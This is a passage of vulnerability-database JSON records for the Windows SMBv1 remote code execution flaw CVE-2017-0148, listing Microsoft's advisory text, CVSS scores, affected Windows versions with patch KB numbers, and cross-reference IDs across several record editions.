"KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T10:45:10", "differentElements": ["msAffectedSoftware"], "edition": 44}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-14T02:48:57", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012598", "KB3210721", "KB4013429", "KB4012212", "KB3205409", "KB4012606", "KB4012216", "KB4012217", "KB4012215", "KB3205401", "KB4013198", "KB3212646", "KB4012213", "KB3210720", "KB3177186", "KB3213986", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T02:48:57", "differentElements": ["msAffectedSoftware"], "edition": 45}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-14T04:52:34", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-14T04:52:34", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-14T04:52:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB3210721", "KB3177186", "KB4013198", "KB3213986", "KB4012217", "KB3212646", "KB3205409", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB4012215", "KB4012214", "KB4012213", "KB4012216", "KB4013429", "KB4012212", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T04:52:34", "differentElements": ["msAffectedSoftware"], "edition": 46}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": 